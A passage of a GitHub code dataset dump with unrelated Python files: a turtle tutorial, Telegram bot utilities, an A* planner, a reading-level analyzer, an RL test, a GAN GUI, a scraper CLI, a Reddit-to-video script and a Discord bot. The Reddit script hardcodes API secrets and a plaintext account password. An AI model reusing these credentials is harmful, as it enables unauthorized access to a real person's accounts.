Finance, The University of Melbourne. \n\nThis is a sample code to illustrate some basic features of the Python language.\nThis notebook was created as supplemental material to a Python for \nfinancial research bootcamp for finance honours and PhD students at \nthe University of Melbourne in March of 2017.\n\nLast update: March 24, 2017.\n\n**Contact**: \n\nLatest version: \n\"\"\"\n\nimport turtle\n\n# Let's create our turtle. We'll call it Bob\n\nbob = turtle.Turtle()\n\n# He doesn't look much like a turtle, but we can fix that.\nbob.shape(name='turtle')\n\n\n# We can move Bob different ways.\n\nbob.forward(100)\nbob.backward(100)\nbob.left(45)\n\n# We can draw with Bob\nbob.pendown()\nbob.pencolor('red')\nbob.forward(100)\n\n# Let's start again\nbob.reset()\n\n# Let's draw a square the hard way.\n\nbob.forward(100)\nbob.right(90)\nbob.forward(100)\nbob.right(90)\nbob.forward(100)\nbob.right(90)\nbob.forward(100)\nbob.right(90)\n\n# That's no good. We can use loops for that (Exercise!)\n\nbob.reset()\n\nfor i in range(4):\n bob.forward(100)\n bob.right(90)\n\n# Now let's write a function to draw a square of any size\n\ndef drawSquare(size):\n for i in range(4):\n bob.forward(size)\n bob.right(90)\n\ndrawSquare(50)\ndrawSquare(200)\n\n# We can even add an optional color argument, and take any turtle!\n\ndef drawSquare(turt, size, color=None):\n if color is not None:\n # Save current pen details\n old_color = turt.getpen().color()[0]\n turt.pencolor(color)\n \n for i in range(4):\n turt.forward(size)\n turt.right(90)\n \n if color is not None:\n # Reset pen details\n turt.pencolor(old_color)\n \ndrawSquare(bob, 200)\ndrawSquare(bob, 200, 'red')\n\n# Say we want to draw squares of squares size (!?!?!)\n\nbob.reset()\n\nsquares = [x*x for x in range(1,21)]\n\nfor x in squares:\n drawSquare(bob, x)\n \n\n# Say we wanted a function to draw any Shape?\n\ndef drawShape(turt, size, sides):\n # First, we need the angle. A full loop is 360 degrees, each angle is\n # a fraction of that. We have the same number of angles as sides.\n angle = 360.0/sides\n for i in range(sides):\n turt.forward(size)\n turt.right(angle)\n\ndrawShape(bob, 100,10)\n\ndrawShape(bob, 10,30)\n\nbob.reset()\n\n# We can draw more complex shapes by combining them\n# Say we want a house\n\ndef drawHouse(turt, size):\n drawSquare(turt, size)\n turt.left(60)\n drawShape(turt, size, 3)\n turt.right(60)\n turt.penup()\n turt.right(45)\n turt.forward(size/5.0)\n turt.left(45)\n turt.pendown()\n drawSquare(turt, size/2.5)\n turt.penup()\n turt.right(45)\n turt.backward(size/5.0)\n turt.left(45)\n turt.pendown()\n\ndrawHouse(bob, 100)\n\n\n# Now we can draw a full neighborhood... but it's a lot of work deciding where\n# to place the house. Let's leave it to chance.\n\nbob.reset()\n\nfrom numpy.random import random\n\n# random() will return a number between 0 and 1.\nrandom()\n\n# We can generate many at a time\nrandom(5)\n\ndef drawNeigborhood(turt, houses=10):\n # In this case, we need 3 numbers: size, x and y coordinates.\n # But it looks better if size is a function of the y coordinate\n # (close == looks bigger).\n rnd = random((houses, 2))\n # Size is between 10 and 80, x and y between -200 and +200\n rnd = (rnd * (200 - (-200))) -200\n \n for i in range(houses):\n turt.penup()\n turt.setposition(rnd[i,0], rnd[i, 1])\n turt.pendown()\n y = rnd[i, 1]\n # For size, we want to smooth it, bigger at -200 (80) at smallest at\n # back (10)\n size = 80 - (((y + 200) / 400) * (80 - 10))\n drawHouse(turt, size)\n\ndrawNeigborhood(bob, 5)\n\nturtle.done()","repo_name":"vgreg/python-finance-unimelb2017","sub_path":"listings/TurtleTutorial.py","file_name":"TurtleTutorial.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"20424124856","text":"import os\nimport requests\nimport setup\nimport time\nimport subprocess\nimport telepot\nfrom constants import ownerChatId, ownerName\nfrom constants import botApi, doumentDownloadUrl\nfrom userUtils import getAdmins\n\nfrom teleModel.models import users\n\n\nbot = telepot.Bot(botApi)\ndownloadDir = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"tmp\")\n\ndef alertOwner(message):\n for admin in getAdmins():\n bot.sendMessage(admin, message)\n\ndef sendMessage(chatId, message):\n bot.sendMessage(chatId, message)\n\ndef timedeltaToReadable(td):\n return \"{} days, {} hours, {} minutes\".format(td.days, td.seconds//3600, (td.seconds//60)%60)\n\ndef executeCommand(command, sendOut=False):\n errors = \"\"\n try:\n excutedCmd = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output, errors = excutedCmd.communicate()\n if errors:\n return \"Error Occured with command execution, error: {}\".format(str(errors))\n else:\n retStr = \"Command executed successfully!\"\n if sendOut:\n retStr += \"\\n{}\".format(output)\n except Exception as e:\n return \"Error Occured while execution, error: {}\".format(str(errors))\n\ndef downloadFile(filepath, fileName):\n try:\n url = doumentDownloadUrl + filepath\n res = requests.get(url, allow_redirects=True)\n downloadPath = os.path.join(downloadDir, fileName)\n with open(downloadPath, 'wb') as download:\n download.write(res.content)\n return downloadPath\n except Exception as e:\n return \"Error Occured: {}\".format(str(e))\n\ndef CreatesuperAdmin():\n try:\n if not users.objects.filter(userId=ownerChatId).exists():\n usersObj = users()\n usersObj.userId = ownerChatId\n usersObj.addedBy = ownerChatId\n usersObj.name = ownerName\n usersObj.isAdmin = True\n usersObj.save()\n sendMessage(ownerChatId, \"Super user added successfully!\")\n except Exception as e:\n sendMessage(ownerChatId, \"Error occured in adding user, error:{}\".format(str(e)))\n\ndef addRequest(senderChatId, senderName):\n if users.objects.filter(userId=senderChatId).exists():\n sendMessage(senderChatId, \"Hi {}, You are already an user of this bot!\".format(senderName))\n else:\n for admin in getAdmins():\n sendMessage(admin, \"{}/{} is requesting to be added to the bot, use \\\"add user /\\\" to add a user\".format(senderChatId, senderName))\n sendMessage(senderChatId, \"Your add request has been placed successfully\")\n\ndef upgradeRequest(senderChatId, senderName):\n if users.objects.filter(userId=senderChatId, isAdmin=True).exists():\n sendMessage(senderChatId, \"Hi {}, You are already an admin of this bot!\".format(senderName))\n else:\n for admin in getAdmins():\n sendMessage(admin, \"{}/{} is requesting to be added as a admin to the bot, use \\\"make admin \\\" to add a user\".format(senderChatId, senderName))\n sendMessage(senderChatId, \"Your admin request has been placed successfully\")\n\ndef addedMessage(data):\n newUserChatId, name = data.strip().split(\"/\")\n sendMessage(newUserChatId, \"Hi {}, you have been added to the bot, Welcome!!\".format(name))\n\ndef upgradedMessage(data):\n newAdminChatId = data.strip()\n sendMessage(newAdminChatId, \"Hi, you have been added as an admin.\")","repo_name":"pramodelangovan/rpi-telegramAutomater","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73434818078","text":"class Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n if (list1 == None and list2==None):\n return list1\n head = ListNode(0,None)\n header = head\n while( list1 and list2 ):\n if(list1.val <= list2.val):\n header.val = list1.val\n list1 = list1.next\n else:\n header.val = list2.val\n list2 = list2.next \n header.next = ListNode(0,None)\n header = header.next \n if(list1):\n header.val =list1.val\n header.next = list1.next\n elif(list2):\n header.val = list2.val\n header.next = list2.next\n return head\n","repo_name":"Euaell/A2SV","sub_path":"Merge Two Sorted Lists.py","file_name":"Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72118262239","text":"from cocoCaption.pycocotools.coco import COCO\nfrom cocoCaption.pycocoevalcap.eval import COCOEvalCap\nimport skimage.io as io\nimport pylab\nimport json\nfrom json import encoder\n\ndef prepareCoco():\n encoder.FLOAT_REPR = lambda o: format(o, '.3f')\n dataDir='.'\n dataType='val2014'\n algName = 'fakecap'\n annFile='%s/cocoCaption/annotations/captions_%s.json'%(dataDir,dataType)\n subtypes=['results', 'evalImgs', 'eval']\n [resFile, evalImgsFile, evalFile]= \\\n ['%s/cocoCaption/results/captions_%s_%s_%s.json'%(dataDir,dataType,algName,subtype) for subtype in subtypes]\n\n coco = COCO(annFile)\n cocoRes = coco.loadRes(resFile)\n cocoEval = COCOEvalCap(coco, cocoRes)\n cocoEval.params['image_id'] = cocoRes.getImgIds()\n cocoEval.evaluate()\n\n return (coco, cocoRes, cocoEval)\n","repo_name":"DanielSlusarczyk/Projekt-Indywidualny","sub_path":"funkcje/Coco.py","file_name":"Coco.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16486354832","text":"CLIENT_ID = 'icyWDqKFjJ-yyKmtZpOugQ'\nSECRET_KEY = 'Eav5ILz4lmBFnmcQqwsrs0dMEp9Kyw'\n\nimport requests\nfrom requests.api import request\nimport pandas as pd\nfrom gtts import gTTS\nfrom moviepy.editor import *\n\nimport os\nimport time\nimport datetime\nfrom Google import Create_Service\nfrom googleapiclient.http import MediaFileUpload\n\nauth = requests.auth.HTTPBasicAuth(CLIENT_ID,SECRET_KEY)\ndata = {'grant_type':'password','username':'adzaaDev','password':'Adamko1997'}\nheaders = {'User-Agent':'MyApi/0.0.1'}\nres = requests.post('https://www.reddit.com/api/v1/access_token',auth=auth,data=data,headers=headers)\nTOKEN = res.json()['access_token']\nheaders['Authorization'] = f'bearer {TOKEN}'\nres = requests.get('https://oauth.reddit.com/r/confession/new',headers=headers,params={'limit':'20'})\nresults_json = res.json()\ndf = pd.DataFrame()\nfor post in res.json()['data']['children']:\n df = df.append({\n 'subredit':post['data']['subreddit'],\n 'title':post['data']['title'],\n 'selftext':post['data']['selftext']\n },ignore_index=True)\n\ndf.to_csv('reddit_articles.csv')\n\ntext = \"\"\nfor i in res.json()['data']['children']:\n text = i['data']['title'],\n\n\n\ndef text_to_speech(text):\n text = ''.join(text)\n mytext = text\n\n language = 'en'\n myobj = gTTS(text=mytext, lang=language, slow=False)\n\n text = myobj.save(\"welcome.mp3\")\n audio_text = AudioFileClip(\"welcome.mp3\")\n return audio_text\n\n\n\ndef make_a_video():\n audio_text = text_to_speech(text)\n img = ['lion.png']\n\n clips = [ImageClip(m).set_duration(2)\n for m in img]\n\n concat_clip = concatenate_videoclips(clips, method=\"compose\",)\n concat_clip = concat_clip.set_audio(audio_text)\n concat_clip.write_videofile(\"test_with_audio2.mp4\", fps=24)\n\n\ntext_to_speech(text)\nmake_a_video()\n","repo_name":"AdamKmet1997/reddit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29325480160","text":"\"\"\"\nYou are taking part in an Escape Room challenge designed specifically for programmers. In your efforts to find a clue, you've found a binary code written on the wall behind a vase, and realized that it must be an encrypted message. After some thought, your first guess is that each consecutive 8 bits of the code stand for the character with the corresponding extended ASCII code.\n\nAssuming that your hunch is correct, decode the message.\n\"\"\"\ndef messageFromBinaryCode(code):\n i=0\n o=''\n while i None:\n super().__init__(collision_checker)\n self._visited: Dict[State, int] = {}\n self._parent_table: Dict[State, State] = {}\n self._queue = PriorityQueue()\n\n def _heuristic(self, state_1: State, state_2: State) -> int:\n raise NotImplementedError(\n f\"Heuristic function for {self.__class__} is not implemented\"\n )\n\n def _cleanup(self):\n self._visited.clear()\n self._parent_table.clear()\n self._queue = PriorityQueue()\n\n def _make_path_from_parent_table(self) -> Path:\n list_states = [self.goal_state]\n current_state = self.goal_state\n while current_state != self.start_state:\n current_state = self._parent_table[current_state]\n list_states.append(current_state)\n list_states.reverse()\n cost = self._visited[self.goal_state]\n return Path(list_states, cost)\n\n def plan(self) -> Path:\n if self.start_state is None:\n raise ValueError(\n f\"{self.__class__}: Start state was not set, use set_start_state(state) method before calling plan()\"\n )\n\n if self.goal_state is None:\n raise ValueError(\n f\"{self.__class__}: Goal state was not set, use set_goal_state(state) method before calling plan()\"\n )\n\n if self.workspace is None:\n raise ValueError(\n f\"{self.__class__}: Workspace was not set, use set_workspace(space) method before calling plan()\"\n )\n\n if self.available_actions is None:\n raise ValueError(\n f\"{self.__class__}: List of available actions was not set, use set_available_actions(actions) method before calling plan()\"\n )\n\n self._cleanup()\n self._queue.put(PrioritizedState(0, self.start_state))\n self._visited[self.start_state] = 0\n\n while not self._queue.empty():\n current_state = self._queue.get().state\n if current_state == self.goal_state:\n final_path = self._make_path_from_parent_table()\n print(f\"{self.__class__}: Path was found\")\n print(\n f\"{self.__class__}: Number of visited states: {len(self._visited)}\"\n )\n print(f\"{self.__class__}: Final cost: {final_path.cost}\")\n return final_path\n for action in self.available_actions:\n next_state = action.apply(current_state)\n if self._collision_checker.is_collision(next_state):\n continue\n if next_state not in self._visited.keys():\n self._visited[next_state] = (\n self._visited[current_state] + action.cost()\n )\n self._parent_table[next_state] = current_state\n self._queue.put(\n PrioritizedState(\n self._visited[next_state]\n + self._heuristic(next_state, self.goal_state),\n next_state,\n )\n )\n elif (\n self._visited[current_state] + action.cost()\n < self._visited[next_state]\n ):\n self._visited[next_state] = (\n self._visited[current_state] + action.cost()\n )\n self._parent_table[next_state] = current_state\n\n print(f\"{self.__class__}: Could not find path between states\")\n return Path([], 0)\n\n\nclass Dijkstra(AStar[Position2DDiscreteTheta]):\n def __init__(self, collision_checker: CollisionChecker) -> None:\n super().__init__(collision_checker)\n\n def _heuristic(\n self, state_1: Position2DDiscreteTheta, state_2: Position2DDiscreteTheta\n ) -> int:\n return 0\n\n\nclass AStarL1Heuristic(AStar[Position2DDiscreteTheta]):\n def __init__(self, collision_checker: CollisionChecker) -> None:\n super().__init__(collision_checker)\n\n def _heuristic(\n self, state_1: Position2DDiscreteTheta, state_2: Position2DDiscreteTheta\n ) -> int:\n return abs(state_2.x - state_1.x) + abs(state_2.y - state_1.y)\n\n\nclass AStarL1WithAngleHeuristic(AStar[Position2DDiscreteTheta]):\n def __init__(self, collision_checker: CollisionChecker) -> None:\n super().__init__(collision_checker)\n\n def _heuristic(\n self, state_1: Position2DDiscreteTheta, state_2: Position2DDiscreteTheta\n ) -> int:\n return (\n abs(state_2.x - state_1.x)\n + abs(state_2.y - state_1.y)\n + abs(state_2.theta - state_1.theta)\n )\n","repo_name":"HelloWorld21951/skoltech-path-planning","sub_path":"PS1/nikolay_naglov_ps1/planners/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36212124949","text":"import re\nimport sys\nimport ChangeLevel\nimport nltk\nimport Globals\nfrom nltk.corpus import cmudict\n\n\"\"\" Reading level analyzer.\n\nThis module reads in text from a file and analyzes the reading level.\n\nExample:\n The program can be run by the following command::\n\n $ python main.py input.txt\n\nAuthors:\n Charles Billingsley\n Josh Getter\n Adam Stewart\n Josh Techentin\n\n\"\"\"\n\n\ndef get_next_line():\n \"\"\"\n Looks at the global line number and file and sets the given variable to the\n data at that line\n \"\"\"\n current_line_data = ''\n\n # Open the file and loop until the requested line number is found\n with open(Globals.input_file) as file:\n\n for number, line in enumerate(file):\n if number == Globals.current_line_number:\n current_line_data = line\n break\n\n # If the line data was updated increment the current line number\n # and return the found data\n if current_line_data:\n Globals.current_line_number += 1\n return current_line_data\n else:\n return \"!!!End of File!!!\"\n\n\ndef get_syllables(words):\n \"\"\"\n Uses the nltk corpus library to get the syllables of each word. If the word\n is not found in the cmu dictionary, it calls manually parses the word.\n\n Code in this section is based off of the following Stack Overflow post:\n https://datascience.stackexchange.com/questions/23376/\n how-to-get-the-number-of-syllables-in-a-word\n\n :param words: The list of words to be parsed\n :return: The total number of syllables\n \"\"\"\n\n number_of_syllables = 0\n\n for word in words:\n try:\n ''' If word is in the dictionary, get it's syllables list.\n Then take pronunciation wit the maximum syllables'''\n number_of_syllables += max(\n [len(list(y for y in x if y[-1].isdigit()))\n for x in Globals.dictionary[word.lower()]])\n except KeyError:\n # The cmu dictionary didn't have the word so manually parse it\n number_of_syllables += manually_parse_syllables(word)\n\n return number_of_syllables\n\n\ndef manually_parse_syllables(word):\n \"\"\"\n Manually finds the syllables in a word if\n the cmu dictionary did not have it.\n\n This code is referred from:\n https://www.stackoverflow.com/questions/14541303/\n count-the-number-of-syllables-in-a-word\n\n :param word: The word to be parsed\n :return: The number of syllables in the word\n \"\"\"\n count = 0\n vowels = 'aeiouy'\n word = word.lower()\n if word[0] in vowels:\n count += 1\n for index in range(1, len(word)):\n if word[index] in vowels and word[index - 1] not in vowels:\n count += 1\n if word.endswith('e'):\n count -= 1\n if word.endswith('le'):\n count += 1\n if count == 0:\n count += 1\n return count\n\n\ndef strip_punctuation(tokens):\n \"\"\"\n Strips the punctuation from the list of tokens.\n\n :param tokens: The list of words and punctuation from nltk\n :return: A list of words without punctuation\n \"\"\"\n words_or_digits_only_regex = re.compile('.*\\w+.*')\n\n # If the word matches the regex, save it. Else ignore it\n words_only_with_contractions = [word for word in tokens if\n words_or_digits_only_regex.match(word)]\n\n remove_contractions_regex = re.compile(\"\\w*'\\w*\")\n\n # Remove all the contractions as nltk counts them as 2 words\n words_only = [word for word in words_only_with_contractions if\n not remove_contractions_regex.match(word)]\n\n return words_only\n\n\ndef get_number_of_sentences(file_text):\n \"\"\"\n Calculates the number of sentences based on the punctuation using regex.\n\n :param file_text: The text in the file\n :return: The number of sentences\n \"\"\"\n\n ''' \n Regex that looks for punctuation, followed by an optional\n quotation mark, followed by white space and/or a new line, followed by\n a capital letter or a quotation mark. Should match text such as \n the following:\n . \"\n . T\n .\"\\n\" \n '''\n end_of_sentence_regex = re.compile('(([.!?])\"*(\\s+|\\n+)([A-Z]|\"))')\n\n number_of_sentences = len(\n re.findall(end_of_sentence_regex, file_text)\n ) + 1 # +1 accounts for the last sentence\n\n return number_of_sentences\n\n\ndef calculate_reading_level_score(number_of_words, number_of_sentences,\n number_of_syllables):\n \"\"\"\n Calculates the reading level score of the file using the Flesch-Kincaid\n Reading Ease Formula.\n\n The formula is as follows:\n 206.835 - 1.015 (Total Words / Total Sentences)\n - 84.6 (Total Syllables / Total Words)\n\n :param number_of_words: The number of words in the piece\n :param number_of_sentences: The number of sentences in the piece\n :param number_of_syllables: The number of syllables in the piece\n :return: The calculated reading level score from the Flesch-Kincaid Reading\n Ease Formula\n \"\"\"\n first_flesch_kincaid_constant = 206.835\n second_flesch_kincaid_constant = 1.015\n third_flesch_kincaid_constant = 84.6\n\n return first_flesch_kincaid_constant - second_flesch_kincaid_constant * (\n number_of_words / number_of_sentences) \\\n - third_flesch_kincaid_constant * (\n number_of_syllables / number_of_words)\n\n\ndef convert_score_to_reading_level(score):\n \"\"\"\n Converts the score from the Flesch-Kincaid Reading Ease Formula into the\n equivalent reading level.\n\n :param score: The score calculated from the\n Flesch-Kincaid Reading Ease Formula\n :return: The description of the reading level\n \"\"\"\n if 100.0 >= score >= 90.0:\n return \"5th Grade Reading Level\"\n elif 90.0 > score >= 80.0:\n return \"6th Grade Reading Level\"\n elif 80.0 > score >= 70.0:\n return \"7th Grade Reading Level\"\n elif 70.0 > score >= 60.0:\n return \"8th & 9th Grade Reading Level\"\n elif 60.0 > score >= 50.0:\n return \"10th to 12th Grade Reading Level\"\n elif 50.0 > score >= 30.0:\n return \"College Reading Level\"\n elif 30.0 > score >= 0:\n return \"College Graduate Reading Level\"\n else: # Got a number greater than 100, or less than 0.\n return \"A reading level so complex, it cannot be classified.\"\n\n\ndef main():\n \"\"\"\n The main function\n \"\"\"\n\n with open(Globals.input_file) as file:\n Globals.file_content = file.read()\n\n while True:\n # Parse each sentence\n sentence = get_next_line()\n\n if sentence == \"!!!End of File!!!\":\n break\n\n Globals.full_input += sentence\n\n tokens = nltk.word_tokenize(sentence)\n words = strip_punctuation(tokens)\n Globals.total_words += len(words)\n\n Globals.total_syllables += get_syllables(words)\n\n Globals.total_sentences = get_number_of_sentences(Globals.file_content)\n\n reading_level_score = calculate_reading_level_score(Globals.total_words,\n Globals.total_sentences,\n Globals.total_syllables)\n\n reading_level = convert_score_to_reading_level(reading_level_score)\n\n print(\"Total Sentences: \" + str(Globals.total_sentences))\n print(\"Total Words: \" + str(Globals.total_words))\n print(\"Total Syllables \" + str(Globals.total_syllables))\n print(\"Reading Level Score \" + str(reading_level_score))\n print(\"Reading Level: \" + str(reading_level))\n\n if Globals.shouldModify:\n print(\"Changing Reading Level to \" + Globals.target_reading_level)\n ChangeLevel.change_level()\n\n\nif __name__ == \"__main__\":\n\n # Check for an input file\n if len(sys.argv) == 2:\n # Analyze reading level data\n Globals.input_file = sys.argv[1]\n elif len(sys.argv) == 3:\n # Analyze reading data and modify to reach target\n Globals.input_file = sys.argv[1]\n Globals.shouldModify = True\n Globals.target_reading_level = sys.argv[2]\n elif len(sys.argv) < 2:\n print(\"Too few arguments provided\")\n print(\"On EOS Try: python3 main.py input.txt {targetLevel}\")\n sys.exit(2)\n elif len(sys.argv) > 3:\n print(\"Too many arguments\")\n print(\"On EOS Try: python3 main.py input.txt {targetLevel}\")\n sys.exit(2)\n\n # Run the program\n main()\n","repo_name":"charlesbillingsley/readingLevelProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"33455402074","text":"#====================================== 6. Test Model\nimport os\nimport gym\nfrom stable_baselines3 import PPO\nfrom stable_baselines3.common.vec_env import DummyVecEnv\nfrom stable_baselines3.common.evaluation import evaluate_policy\n\nenvironment_name = 'CartPole-v0'\nenv = gym.make(environment_name)\nPPO_Path = os.path.join('Training','Saved Models','PPO_Model_Cartpole')\nmodel = PPO.load(PPO_Path)\n\nepisodes = 5\nfor episode in range(1, episodes+1):\n obs = env.reset()\n done = False\n score = 0\n \n while not done:\n env.render()\n action, _ = model.predict(obs)\n obs, reward, done, info = env.step(action)\n score += reward\n print('Episode:{} Score:{}'.format(episode, score))\nenv.close()","repo_name":"ScorelessPine/Reinforcement_Learning_Project","sub_path":"MainCourseTest.py","file_name":"MainCourseTest.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2737100402","text":"# Creating predictions for the drawings here\n\nimport os\nimport cv2 \nimport time\nimport logging\nimport numpy as np \nimport tensorflow as tf \nfrom helpers import draw\nfrom helpers.utils import *\nfrom configs.gui_configs import *\n\ntf.get_logger().setLevel(logging.ERROR)\n\nclass Inference:\n def __init__(self, generator_path, original_shape, sample_shape):\n self.original_shape = original_shape\n self.sample_shape = sample_shape\n self.sample = None\n self.pred = None\n self.generator = tf.keras.models.load_model(generator_path)\n \n def prepare(self, sample):\n sample = resize(sample, self.sample_shape)\n sample = convert_channel(sample, cv2.COLOR_BGR2RGB)\n sample = normalize(sample.reshape(-1, *self.sample_shape))\n self.sample = sample.copy()\n \n def generate(self):\n pred = self.generator.predict(self.sample)\n self.sample = None \n self.pred = pred\n \n def get_outcome(self, auto_resize=True):\n pred = denormalize(self.pred.squeeze())\n pred = convert_channel(pred, cv2.COLOR_RGB2BGR)\n if auto_resize:\n pred = resize(pred, self.original_shape)\n return pred\n \nclass Result:\n def __init__(self, screen, original, result, pts, wX, wY):\n self.screen = screen.copy()\n self.screen[pts[0]-pts[1]: pts[0]+pts[1],\n pts[2]-pts[3]: pts[2]+pts[3]] = result\n self.original = original\n self.result = result\n self.wX, self.wY = wX, wY\n self.paint_helper = draw.Paint()\n self.color = [0, 0, 0]\n self.switch_color = False\n self.indices = [0, 1, 2]\n self.button_boxes = [(0, 0, 0) for _ in range(2)]\n self.button_times = [None, None]\n self.choice_made = False\n \n def gradient_title(self):\n if not self.switch_color:\n if self.color[self.indices[0]] != 255:\n self.color[self.indices[0]] += 5\n else:\n if self.color[self.indices[1]] != 255:\n self.color[self.indices[1]] += 5\n else:\n if self.color[self.indices[2]] != 255:\n self.color[self.indices[2]] += 5\n else: \n self.switch_color = True \n np.random.shuffle(self.indices)\n else:\n if self.color[self.indices[0]] != 0:\n self.color[self.indices[0]] -= 5\n else:\n if self.color[self.indices[1]] != 0:\n self.color[self.indices[1]] -= 5\n else:\n if self.color[self.indices[2]] != 0:\n self.color[self.indices[2]] -= 5\n else: \n self.switch_color = False\n np.random.shuffle(self.indices)\n \n def check_events(self, event, x, y, flags, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n self.check_return_choice(x, y)\n self.check_save_choice(x, y)\n \n def check_return_choice(self, x, y):\n if x <= gX2+60 and x >= gX+110:\n if y <= gY2-10 and y >= gY+20:\n self.button_boxes[1] = (200, 0, 200)\n self.button_times[1] = time.time()\n self.choice_made = True\n \n def check_save_choice(self, x, y):\n if x <= gX2-110 and x >= gX-60:\n if y <= gY2-10 and y >= gY+20:\n self.button_boxes[0] = (0, 200, 0)\n self.button_times[0] = time.time()\n os.system(\"mkdir result\")\n cv2.imwrite(os.sep.join([\"result\", \"result.jpg\"]), self.result)\n cv2.imwrite(os.sep.join([\"result\", \"input.jpg\"]), self.original)\n \n def start(self):\n cv2.namedWindow(\"UStar\", cv2.WINDOW_NORMAL)\n cv2.resizeWindow(\"UStar\", 812, 478)\n cv2.moveWindow(\"UStar\", self.wX, self.wY-95)\n while not self.choice_made:\n screen = self.paint_helper.save_button(self.screen, gX-60, gY+20, gX2-110, gY2-10)\n screen = self.paint_helper.return_button(screen, gX+110, gY+20, gX2+60, gY2-10)\n self.gradient_title()\n cv2.setMouseCallback(\"UStar\", self.check_events)\n cv2.putText(screen, \"Your Imaginary Star\", (270, 70), cv2.FONT_HERSHEY_TRIPLEX,\n 1.0, self.color, 2)\n screen = self.paint_helper.button_alignment(screen,\n [(gX-60, gY+20), (gX2-110, gY2-10)],\n self.button_boxes[0])\n screen = self.paint_helper.button_alignment(screen,\n [(gX+110, gY+20), (gX2+60, gY2-10)],\n self.button_boxes[1])\n cv2.imshow(\"UStar\", screen)\n if cv2.waitKey(1) == ord(\"q\"):\n quit()\n self.button_boxes[0], self.button_times[0] = self.paint_helper.update_button(self.button_boxes[0],\n self.button_times[0])\n self.button_boxes[1], self.button_times[1] = self.paint_helper.update_button(self.button_boxes[1],\n self.button_times[1])\n cv2.destroyWindow(\"UStar\")\n \n","repo_name":"Moeed1mdnzh/UStar-GUI","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"69919099999","text":"\"\"\" Run program \"\"\"\nimport argparse\nimport logging\nfrom social_media_scraper.run import run\n\nparser_description = \"\"\"\nSettings for application\nExample usage:\npython -m social_media_scraper -m full -i \"./example-identification.csv\" -o \"./output.db\" -lb 1 -ub 3 -d -s -g \"/path/to/driver/geckodriver.exe\"\n\"\"\"\n\nparser = argparse.ArgumentParser(description=parser_description)\n\nparser.add_argument(\"-m\", \"--mode\", help=\"Scrape user account, match identity by data or both (pass acc, id or full respectively)\", type=str, required=True)\nparser.add_argument(\"-i\", \"--input\", help=\"Input file location\", type=str)\nparser.add_argument(\"-o\", \"--output\", help=\"Output file location\", type=str)\nparser.add_argument(\"-lb\", \"--lower_bound\", help=\"Request frequency lower bound\", type=int)\nparser.add_argument(\"-ub\", \"--upper_bound\", help=\"Request frequency upper bound\", type=int)\nparser.add_argument(\"-g\", \"--geckodriver\", type=str, help=\"Set path for geckodriver\")\nparser.add_argument(\"-d\", \"--debugging\", help=\"Runs application in debug mode (will log debug logs into console)\", action=\"store_true\")\nparser.add_argument(\"-s\", \"--sql\", help=\"Log sql into console\", action=\"store_true\")\nparser.add_argument(\"-int\", \"--interface\", help=\"Run app in account scraping mode with interface\", action=\"store_true\")\nparser.add_argument(\"-tp\", \"--twitter_profile\", help=\"Firefox profile path for twitter (Should have GoodTwitter addon because of redesign)\", type=str)\n\nargs = parser.parse_args()\n\nif args.debugging:\n logging.basicConfig(level=logging.INFO)\n\nrun(args)\n","repo_name":"dmitrijbozhkov/SocialMediaScraper","sub_path":"social_media_scraper/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25007605142","text":"import pymongo\nimport asyncio\nimport time\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Context\nfrom discord import app_commands\nfrom datetime import datetime, timedelta\nimport time\nimport random\nimport tok\n\nMONGO = tok.mongo\nclient = pymongo.MongoClient(MONGO)\ndb = client.DiscordJasperBot\n\n# ❔\n# ✅\n# 🍃\n#\ndef generate_rewards(user_id:int,lootID:str):\n #Put a badge checker\n #Badge Description\n #Some Sytem to make sure you dont see badge twice after claim\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n catData = db.OnAdventure.find_one({\"_id\": user_id})\n catData[\"Total\"] += 1\n rewards = []\n if lootID == \"Tree\":\n catData[\"GC\"] += 1\n ran1 = int(random.randint(1, 10))\n ran2 = int(random.randint(1, 100))\n if ran2 == 69:\n userData[\"3G\"] = True\n rewards.append(\"Grass Lands Badge 3\")\n if ran1 == 10:\n userData[\"1G\"] = True\n userData[\"Grass\"] += 8\n rewards.append(\"Grass Lands Badge 1\")\n rewards.append(\"8 Grass\")\n elif ran1 <= 5:\n userData[\"Grass\"] += 3\n rewards.append(\"3 Grass\")\n elif ran1 <= 8:\n userData[\"Grass\"] += 5\n rewards.append(\"5 Grass\")\n \n #Insert\n elif lootID == \"Sand\":\n catData[\"SC\"] += 1\n ran1 = int(random.randint(1, 32))\n if ran1 == 32:\n userData[\"1S\"] = True\n userData[\"Sand\"] += 12\n userData[\"Glass\"] += 3\n rewards.append(\"Desert 